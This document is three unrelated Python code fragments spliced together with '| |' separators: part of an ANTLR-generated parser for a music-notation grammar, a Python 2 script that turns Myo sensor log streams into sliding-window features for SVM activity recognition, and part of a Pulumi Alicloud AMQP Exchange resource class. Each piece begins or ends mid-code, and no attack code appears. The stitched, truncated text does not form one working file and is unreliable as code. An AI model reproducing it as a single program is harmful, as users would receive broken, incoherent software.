super().copyFrom(ctx)
class NoteExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_noteContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterNoteExpression" ):
listener.enterNoteExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitNoteExpression" ):
listener.exitNoteExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitNoteExpression" ):
return visitor.visitNoteExpression(self)
else:
return visitor.visitChildren(self)
class ChordExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_chord(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_chordContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterChordExpression" ):
listener.enterChordExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitChordExpression" ):
listener.exitChordExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitChordExpression" ):
return visitor.visitChordExpression(self)
else:
return visitor.visitChildren(self)
class AccidentalExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_acc(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_accContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAccidentalExpression" ):
listener.enterAccidentalExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAccidentalExpression" ):
listener.exitAccidentalExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitAccidentalExpression" ):
return visitor.visitAccidentalExpression(self)
else:
return visitor.visitChildren(self)
class VariableExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_var(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_varContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterVariableExpression" ):
listener.enterVariableExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitVariableExpression" ):
listener.exitVariableExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitVariableExpression" ):
return visitor.visitVariableExpression(self)
else:
return visitor.visitChildren(self)
class RestExpressionContext(ExprContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a MyGrammerParser.ExprContext
super().__init__(parser)
self.copyFrom(ctx)
def expr_rest(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_restContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterRestExpression" ):
listener.enterRestExpression(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitRestExpression" ):
listener.exitRestExpression(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitRestExpression" ):
return visitor.visitRestExpression(self)
else:
return visitor.visitChildren(self)
def expr(self):
localctx = MyGrammerParser.ExprContext(self, self._ctx, self.state)
self.enterRule(localctx, 26, self.RULE_expr)
try:
self.state = 152
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,12,self._ctx)
if la_ == 1:
localctx = MyGrammerParser.NoteExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 1)
self.state = 147
self.expr_note()
pass
elif la_ == 2:
localctx = MyGrammerParser.ChordExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 2)
self.state = 148
self.expr_chord()
pass
elif la_ == 3:
localctx = MyGrammerParser.VariableExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 3)
self.state = 149
self.expr_var()
pass
elif la_ == 4:
localctx = MyGrammerParser.AccidentalExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 4)
self.state = 150
self.expr_acc()
pass
elif la_ == 5:
localctx = MyGrammerParser.RestExpressionContext(self, localctx)
self.enterOuterAlt(localctx, 5)
self.state = 151
self.expr_rest()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_noteContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def note_value(self):
return self.getTypedRuleContext(MyGrammerParser.Note_valueContext,0)
def OPEN_PAR(self):
return self.getToken(MyGrammerParser.OPEN_PAR, 0)
def PITCH(self):
return self.getToken(MyGrammerParser.PITCH, 0)
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def INTEGER(self):
return self.getToken(MyGrammerParser.INTEGER, 0)
def CLOSE_PAR(self):
return self.getToken(MyGrammerParser.CLOSE_PAR, 0)
def ACCIDENTAL(self):
return self.getToken(MyGrammerParser.ACCIDENTAL, 0)
def DOTTED(self):
return self.getToken(MyGrammerParser.DOTTED, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_note
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_note" ):
listener.enterExpr_note(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_note" ):
listener.exitExpr_note(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_note" ):
return visitor.visitExpr_note(self)
else:
return visitor.visitChildren(self)
def expr_note(self):
localctx = MyGrammerParser.Expr_noteContext(self, self._ctx, self.state)
self.enterRule(localctx, 28, self.RULE_expr_note)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 154
self.note_value()
self.state = 155
self.match(MyGrammerParser.OPEN_PAR)
self.state = 157
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==MyGrammerParser.ACCIDENTAL:
self.state = 156
self.match(MyGrammerParser.ACCIDENTAL)
self.state = 159
self.match(MyGrammerParser.PITCH)
self.state = 160
self.match(MyGrammerParser.COMMA_SEP)
self.state = 161
self.match(MyGrammerParser.INTEGER)
self.state = 162
self.match(MyGrammerParser.CLOSE_PAR)
self.state = 164
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==MyGrammerParser.DOTTED:
self.state = 163
self.match(MyGrammerParser.DOTTED)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_chordContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def CHORD(self):
return self.getToken(MyGrammerParser.CHORD, 0)
def OPEN_PAR(self, i:int=None):
if i is None:
return self.getTokens(MyGrammerParser.OPEN_PAR)
else:
return self.getToken(MyGrammerParser.OPEN_PAR, i)
def expr_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_noteContext,0)
def expr_add_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_noteContext,0)
def CLOSE_PAR(self, i:int=None):
if i is None:
return self.getTokens(MyGrammerParser.CLOSE_PAR)
else:
return self.getToken(MyGrammerParser.CLOSE_PAR, i)
def note_value(self):
return self.getTypedRuleContext(MyGrammerParser.Note_valueContext,0)
def FIXED_CHORD(self):
return self.getToken(MyGrammerParser.FIXED_CHORD, 0)
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def INTEGER(self):
return self.getToken(MyGrammerParser.INTEGER, 0)
def DOTTED(self):
return self.getToken(MyGrammerParser.DOTTED, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_chord
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_chord" ):
listener.enterExpr_chord(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_chord" ):
listener.exitExpr_chord(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_chord" ):
return visitor.visitExpr_chord(self)
else:
return visitor.visitChildren(self)
def expr_chord(self):
localctx = MyGrammerParser.Expr_chordContext(self, self._ctx, self.state)
self.enterRule(localctx, 30, self.RULE_expr_chord)
self._la = 0 # Token type
try:
self.state = 185
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,16,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 166
self.match(MyGrammerParser.CHORD)
self.state = 167
self.match(MyGrammerParser.OPEN_PAR)
self.state = 168
self.expr_note()
self.state = 169
self.expr_add_note()
self.state = 170
self.match(MyGrammerParser.CLOSE_PAR)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 172
self.match(MyGrammerParser.CHORD)
self.state = 173
self.match(MyGrammerParser.OPEN_PAR)
self.state = 174
self.note_value()
self.state = 175
self.match(MyGrammerParser.OPEN_PAR)
self.state = 176
self.match(MyGrammerParser.FIXED_CHORD)
self.state = 177
self.match(MyGrammerParser.CLOSE_PAR)
self.state = 179
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==MyGrammerParser.DOTTED:
self.state = 178
self.match(MyGrammerParser.DOTTED)
self.state = 181
self.match(MyGrammerParser.COMMA_SEP)
self.state = 182
self.match(MyGrammerParser.INTEGER)
self.state = 183
self.match(MyGrammerParser.CLOSE_PAR)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_add_noteContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def expr_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_noteContext,0)
def expr_add_note(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_noteContext,0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_add_note
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_add_note" ):
listener.enterExpr_add_note(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_add_note" ):
listener.exitExpr_add_note(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_add_note" ):
return visitor.visitExpr_add_note(self)
else:
return visitor.visitChildren(self)
def expr_add_note(self):
localctx = MyGrammerParser.Expr_add_noteContext(self, self._ctx, self.state)
self.enterRule(localctx, 32, self.RULE_expr_add_note)
try:
self.state = 193
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,17,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 187
self.match(MyGrammerParser.COMMA_SEP)
self.state = 188
self.expr_note()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 189
self.match(MyGrammerParser.COMMA_SEP)
self.state = 190
self.expr_note()
self.state = 191
self.expr_add_note()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_varContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def IDENTIFIER(self):
return self.getToken(MyGrammerParser.IDENTIFIER, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_var
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_var" ):
listener.enterExpr_var(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_var" ):
listener.exitExpr_var(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_var" ):
return visitor.visitExpr_var(self)
else:
return visitor.visitChildren(self)
def expr_var(self):
localctx = MyGrammerParser.Expr_varContext(self, self._ctx, self.state)
self.enterRule(localctx, 34, self.RULE_expr_var)
try:
self.enterOuterAlt(localctx, 1)
self.state = 195
self.match(MyGrammerParser.IDENTIFIER)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_accContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ACCIDENTAL_KEY(self):
return self.getToken(MyGrammerParser.ACCIDENTAL_KEY, 0)
def OPEN_PAR(self):
return self.getToken(MyGrammerParser.OPEN_PAR, 0)
def expr_add_acc(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_accContext,0)
def CLOSE_PAR(self):
return self.getToken(MyGrammerParser.CLOSE_PAR, 0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_acc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_acc" ):
listener.enterExpr_acc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_acc" ):
listener.exitExpr_acc(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_acc" ):
return visitor.visitExpr_acc(self)
else:
return visitor.visitChildren(self)
def expr_acc(self):
localctx = MyGrammerParser.Expr_accContext(self, self._ctx, self.state)
self.enterRule(localctx, 36, self.RULE_expr_acc)
try:
self.enterOuterAlt(localctx, 1)
self.state = 197
self.match(MyGrammerParser.ACCIDENTAL_KEY)
self.state = 198
self.match(MyGrammerParser.OPEN_PAR)
self.state = 199
self.expr_add_acc()
self.state = 200
self.match(MyGrammerParser.CLOSE_PAR)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Expr_add_accContext(ParserRuleContext):
__slots__ = 'parser'
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def ACCIDENTAL(self):
return self.getToken(MyGrammerParser.ACCIDENTAL, 0)
def PITCH(self):
return self.getToken(MyGrammerParser.PITCH, 0)
def COMMA_SEP(self):
return self.getToken(MyGrammerParser.COMMA_SEP, 0)
def expr_add_acc(self):
return self.getTypedRuleContext(MyGrammerParser.Expr_add_accContext,0)
def getRuleIndex(self):
return MyGrammerParser.RULE_expr_add_acc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterExpr_add_acc" ):
listener.enterExpr_add_acc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitExpr_add_acc" ):
listener.exitExpr_add_acc(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitExpr_add_acc" ):
return visitor.visitExpr_add_acc(self)
else:
return visitor.visitChildren(self)
def expr_add_acc(self):
localctx = MyGrammerParser.Expr_add_accContext(self, self._ctx, self.state)
self.enterRule(localctx, 38, self.RULE_expr_add_acc)
try:
self.state = 212
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,18,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 202
self.match(MyGrammerParser.ACCIDENTAL)
self.state = 203
self.match(MyGrammerParser.PITCH)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 204
self.match(MyGrammerParser.ACCIDENTAL)
self.state = 205
self.match(MyGrammerParser.PITCH)
self.state = 206
self.match(MyGrammerParser.COMMA_SEP)
self.state = 207
self.expr_add_acc()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 208
self.match(MyGrammerParser.PITCH)
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 209
self.match(MyGrammerParser.PITCH)
self.state = 210
self.match(MyGrammerParser.COMMA_SEP)
self.state = 211
self.expr_add_acc()
| |
#!/usr/bin/python
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import time
import sys
import threading
import random
import Queue
from sklearn import preprocessing, svm, tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.decomposition import PCA
import math
import pickle
import os
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def generate_stream(logfile, df):
"""
generate_stream generate stream from a log file in real time manner
Parameters:
logfile: the input file that convert to DataFrame (df) and use as a real time stream,
the logfile could be an offline file or a file that constantly being written
other program (e.g. hello-myo )
df: the DataFrame that holds all the updates from logfile, df will be shared with other
thread(s)
"""
print 'start stream+++++++++++'
i = 0
while 1:
where = logfile.tell()
line = logfile.readline()
if not line:
print 'not line, stream waiting'
time.sleep(0.5)
logfile.seek(where)
i += 1
else:
ll = line.strip(' \r\n').split(',')
df.loc[ll[0]] = ll[1:11]
i = 0
#print df.ix[-1]
if i == 20:
break
def normalization(arr):
"""
normalization: scale arrary or DataFrame to mean zero and range from -1 to 1
Parameters:
arr: numpy arrary or pandas DataFrame
Return:
scaled arrary value
"""
return (arr - arr.mean(0)) / (arr.max(0) - arr.min(0))
def count_mean_crossing(df):
"""
count_mean_crossing: count number of mean crossing on each dimension of ndarrary or DataFrame
Parameters:
df: DataFrame
Return:
array type, number of mean crossing on each dimension
"""
tmp_df = df - df.mean(0)
d = df.shape[1]
res = np.zeros(d)
for i in xrange(d) :
col = df.ix[:, i].values
res[i] = np.count_nonzero(np.diff(np.sign(col)))
return res
def calculate_stat(df):
"""
calculate_stat: calculate different statistics of given DataFrame, this function is used to generate
features (list of feature as a sample point) for support vector machine
Parameter:
df: DataFrame type, usually df is a sliding window in this function
Return:
right now for each input sliding window of 9 dimension, calculate_stat will calculate 9*4 = 36 features
i.e. [mean, median, var, number_of_mean_crossing ] for each dimension [accel_xyz, gyro_xyz, row, pitch, yaw]
"""
#df = normalization(df)
mean = df.mean(0).values
median = df.median(0).values
var = df.var(0).values
mean_crossing_count = count_mean_crossing(df)
#print 'mean_crossing_count: ', mean_crossing_count
res = np.concatenate((mean, median, var, mean_crossing_count))
#print 'feature size', res.shape, 'feature: \n', res
return res
def get_sliding_window(df, ws, get_traning_data = False, label = -1, \
n_sample = 45, pattern_name = 'NA', output_format = 'hdf', \
save_data = 'train', aws = 120, ss = None, fs = 20):
"""
get_sliding_window: 1. generate sliding window from datastream in real time manner
2. generate training feature samples for SVM (when get_traning_data is True) or testing the
real time stream by recognizing the current unit patterns
3. store the generated feature sampels (store in HDF5 when output_format = 'hdf', in csv file when output_format = 'csv')
Parameters:
df is the datastream
ws windows size, here us is the time duration, e.g. 2 seconds
if get_traning_data set True, training phase. get_sliding_window() generates sliding window from datastream, calculate statistics (features) for each sliding window,
those samples are used as training sample to train a PCA model and a SVM model, and store training feature samples in either 'hdf5' or 'csv'
if get_traning_data set False, testing phase. get_sliding_window() generates sliding window from datastream, calculate statistics (features) for each sliding window,
those samples are used as testing samples that apply to PCA and SVM model generated above for predicting unit_patterns in real time manner
right now we apply every accumulated 15 testing samples with PCA and SVM due to the consideration of scaling generated statistics (features)
label: the label corresponding to the unit_patterns (for training purpose), effective only in the training phase
n_sample: number of training samples to generate, effective only in the training phase, default to 45
output_format: right now support save as 'hdf5' or 'csv'
save_data:
'train' save collected training samples, effective only in the training phase, right now only support 'hdf5'
'train_append' if user want to append training samples if the corresponding DataFrame already exists,
effective only in the training phase, right now only support 'hdf5'
'test' save collected testing samples, effective only in the training phase, right now only support 'hdf5'
'test_simple' save collected testing samples with only time index with label and label_index,
effective only in the training phase, right now only support 'hdf5'
aws: activity window size, default 120, i.e. the system will predict the current activity every every 120 sliding_window
ss is the step size in time duration, e.g. when ws = 4 seconds, ss = 1 second, sliding windows will have 75 percent overlapping
fs is the sample frequency, right now it is 20 samples/second generated by hello-myo.cpp
"""
print '+++++++++++++++++++start sliding windows+++++++++++++++++'
if ss is None:
# ss was not provided. the windows will not overlap in any direction.
ss = ws * 0.25
ss = int(ss * fs)
ws = int(ws * fs)
argv_list = ['roll_w', 'pitch_w', 'yaw_w','accel_x', 'accel_y', 'accel_z', 'gyro_x', 'gyro_y', 'gyro_z']
start = 0
end = start + ws
#print 'ss: ', ss
#print 'ws: ', ws
#if get_traning_data:
feature_header = ['label_index', 'label']
stat_feature = ['_mean', '_median', '_var', '_meanCrossCount']
#feature_list = np.zeros(len(argv_list)* len(stat_feature) )
if n_sample <= 0:
n_sample = 45
for fe in stat_feature:
for arg in argv_list:
feature_header.append(arg+fe)
#print 'feature_header: ', feature_header
n_feature = len(feature_header)
feature_header.append('estimate_label')
feature_header.append('estimate_label_index')
feature_list = pd.DataFrame(columns= feature_header).dropna();
feature_list.loc[0] = 0
win_n = 0
i = 0
real_stream_start = 0
real_stream_end = 0
real_ws = 5
epoch_time = 0
format_time_t = ''
if save_data == 'test_simple':
act_COUNT = 0
act_wind_count = 0
bow_features = pd.DataFrame(columns= ['start_time', 'end_time'] + label_index.keys() )
bow_features.loc[act_COUNT] = 0
unit_pattern_list = []
res_label = 'NA'
f_gui = open('to_gui.csv', 'w+')
gui_string_ = 'time,estimated_unit_pattern,estimated_activity\n'
f_gui.write(gui_string_)
#try:
if True:
while 1:
if end < df.shape[0]:
sliding_window = df.iloc[start:end]
#epoch_time = df.index[start]
format_time_t = df['formatted_time'][start]
if save_data == 'test_simple':
if act_wind_count == 0 :
bow_features.loc[act_COUNT]['start_time'] = format_time_t
act_wind_count +=1
elif act_wind_count == aws:
bow_features.loc[act_COUNT]['end_time'] = format_time_t
file_name = 'stream_' + pattern_name + '_.txt'
tmp_test = bow_features.loc[act_COUNT]
#print 'before: tmp_test :', tmp_test, '\n', tmp_test.shape
tmp_test = tmp_test.ix[2:].values
#print 'tmp_test :', tmp_test
test_label = -1
#print 'act_pca_: ', act_pca_
res_label_index = testing_accuracy(tmp_test, test_label, act_pca_, act_model_, activity = True )
#print 'res_label_index: ', res_label_index
res_label = act_index_label[res_label_index[0]]
with open(file_name, 'wa') as f:
for item in unit_pattern_list:
f.write("%s, " % item)
f.write("\n\n")
unit_pattern_list = []
act_COUNT +=1
print '*************************act_COUNT: ', act_COUNT
bow_features.loc[act_COUNT] = 0
act_wind_count = 0
else:
act_wind_count +=1
#print '#####################act_COUNT: ', act_COUNT
#print '#####################act_wind_count: ', act_wind_count
sliding_window = sliding_window[argv_list].astype(np.float).dropna()
print '$sliding_window number: $', win_n, ' index start: ', start, ' end: ', end#, ':\n', sliding_window
### withou normlaization of the sliding window
feature = calculate_stat(sliding_window)
#print 'first, feature size: ', feature.shape, ' feature: ', feature
#feature = np.insert(feature, 0, label)
#print 'feature size: ', feature.shape, ' feature: ', feature
#feature_list = np.vstack((feature_list, feature))
#print 'pattern_name: ', pattern_name
if pattern_name in label_index.keys() :
feature_list.ix[win_n, 0:2] = [label_index[pattern_name], pattern_name]
else:
#print 'feature_list: ', feature_list
#print 'feature_list.ix[win_n, 0:2]: ', feature_list.ix[win_n, 0:2]
feature_list.ix[win_n, 0:2] = [-1, pattern_name]
feature_list.ix[win_n, 2:n_feature] = feature
#print 'feature_list.index: ', feature_list.index
#print 'feature_list.index[win_n]: ', feature_list.index[win_n]
#feature_list.index = format_time_t
win_n += 1
if get_traning_data:
feature_list.ix[win_n, -2:] = 'NA'
if win_n == n_sample:
break
else:
real_stream_end = win_n
if real_stream_end - real_stream_start >= real_ws:
df_tmp = feature_list.ix[real_stream_start: real_stream_end ].convert_objects()
#print 'df_tmp&&&&&&&&&&&&&&&&&&&&&: ', df_tmp
[df_test, test_label] = get_sample_label( df_tmp )
#### double check wether you need scale df_test
est_label_k = testing_accuracy(df_test, test_label, pca_, model_ )
#print '$$$$$$$$$$$ df_test shape: ', df_test.shape
"""
### K Means model
kmeans_test_pred = cluster_model_.predict(df_test) + 1
kmeans_distance = kmeans_dist(cluster_model_.cluster_centers_, df_test)
print '$$$$$$$$$$$$$$$$$$$$$$$$kmeans_distance: \n', kmeans_distance
kmeans_test_min_distance_index = np.argmin(kmeans_distance , axis=1) + 1
print '$$$$$$$$$$$$$$$$$$$$$$$kmeans_test_pred:', kmeans_test_pred
print '$$$$$$$$$$kmeans_test_min_distance_index ', kmeans_test_min_distance_index
"""
### GMM Model
#c_test_pred_prob = cluster_model_.predict_proba(df_test)
#c_test_prob_label | |
The message is routed to the bound Queue by comparing the attribute key-value pair and the bound attribute key-value pair.
:param pulumi.Input[str] instance_id: The ID of the instance.
:param pulumi.Input[bool] internal: Specifies whether an exchange is an internal exchange. Valid values:
* false: The exchange is not an internal exchange.
* true: The exchange is an internal exchange.
:param pulumi.Input[str] virtual_host_name: The name of virtual host where an exchange resides.
"""
if alternate_exchange is not None:
pulumi.set(__self__, "alternate_exchange", alternate_exchange)
if auto_delete_state is not None:
pulumi.set(__self__, "auto_delete_state", auto_delete_state)
if exchange_name is not None:
pulumi.set(__self__, "exchange_name", exchange_name)
if exchange_type is not None:
pulumi.set(__self__, "exchange_type", exchange_type)
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if internal is not None:
pulumi.set(__self__, "internal", internal)
if virtual_host_name is not None:
pulumi.set(__self__, "virtual_host_name", virtual_host_name)
@property
@pulumi.getter(name="alternateExchange")
def alternate_exchange(self) -> Optional[pulumi.Input[str]]:
"""
The alternate exchange. An alternate exchange is configured for an existing exchange. It is used to receive messages that fail to be routed to queues from the existing exchange.
"""
return pulumi.get(self, "alternate_exchange")
@alternate_exchange.setter
def alternate_exchange(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alternate_exchange", value)
@property
@pulumi.getter(name="autoDeleteState")
def auto_delete_state(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Auto Delete attribute is configured. Valid values:
* true: The Auto Delete attribute is configured. If the last queue that is bound to an exchange is unbound, the exchange is automatically deleted.
* false: The Auto Delete attribute is not configured. If the last queue that is bound to an exchange is unbound, the exchange is not automatically deleted.
"""
return pulumi.get(self, "auto_delete_state")
@auto_delete_state.setter
def auto_delete_state(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_delete_state", value)
@property
@pulumi.getter(name="exchangeName")
def exchange_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the exchange. It must be 1 to 255 characters in length, and can contain only letters, digits, hyphens (-), underscores (_), periods (.), and at signs (@).
"""
return pulumi.get(self, "exchange_name")
@exchange_name.setter
def exchange_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exchange_name", value)
@property
@pulumi.getter(name="exchangeType")
def exchange_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the exchange. Valid values:
* FANOUT: An exchange of this type routes all the received messages to all the queues bound to this exchange. You can use a fanout exchange to broadcast messages.
* DIRECT: An exchange of this type routes a message to the queue whose binding key is exactly the same as the routing key of the message.
* TOPIC: This type is similar to the direct exchange type. An exchange of this type routes a message to one or more queues based on the fuzzy match or multi-condition match result between the routing key of the message and the binding keys of the current exchange.
* HEADERS: Headers Exchange uses the Headers property instead of Routing Key for routing matching.
When binding Headers Exchange and Queue, set the key-value pair of the binding property;
when sending a message to the Headers Exchange, set the message's Headers property key-value pair and use the message Headers
The message is routed to the bound Queue by comparing the attribute key-value pair and the bound attribute key-value pair.
"""
return pulumi.get(self, "exchange_type")
@exchange_type.setter
def exchange_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "exchange_type", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the instance.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter
def internal(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether an exchange is an internal exchange. Valid values:
* false: The exchange is not an internal exchange.
* true: The exchange is an internal exchange.
"""
return pulumi.get(self, "internal")
@internal.setter
def internal(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "internal", value)
@property
@pulumi.getter(name="virtualHostName")
def virtual_host_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of virtual host where an exchange resides.
"""
return pulumi.get(self, "virtual_host_name")
@virtual_host_name.setter
def virtual_host_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_host_name", value)
class Exchange(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alternate_exchange: Optional[pulumi.Input[str]] = None,
auto_delete_state: Optional[pulumi.Input[bool]] = None,
exchange_name: Optional[pulumi.Input[str]] = None,
exchange_type: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
internal: Optional[pulumi.Input[bool]] = None,
virtual_host_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a RabbitMQ (AMQP) Exchange resource.
For information about RabbitMQ (AMQP) Exchange and how to use it, see [What is Exchange](https://help.aliyun.com/).
> **NOTE:** Available in v1.128.0+.
## Example Usage
Basic Usage
```python
import pulumi
import pulumi_alicloud as alicloud
example_virtual_host = alicloud.amqp.VirtualHost("exampleVirtualHost",
instance_id="amqp-abc12345",
virtual_host_name="my-VirtualHost")
example_exchange = alicloud.amqp.Exchange("exampleExchange",
auto_delete_state=False,
exchange_name="my-Exchange",
exchange_type="DIRECT",
instance_id=example_virtual_host.instance_id,
internal=False,
virtual_host_name=example_virtual_host.virtual_host_name)
```
## Import
RabbitMQ (AMQP) Exchange can be imported using the id, e.g.
```sh
$ pulumi import alicloud:amqp/exchange:Exchange example <instance_id>:<virtual_host_name>:<exchange_name>
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
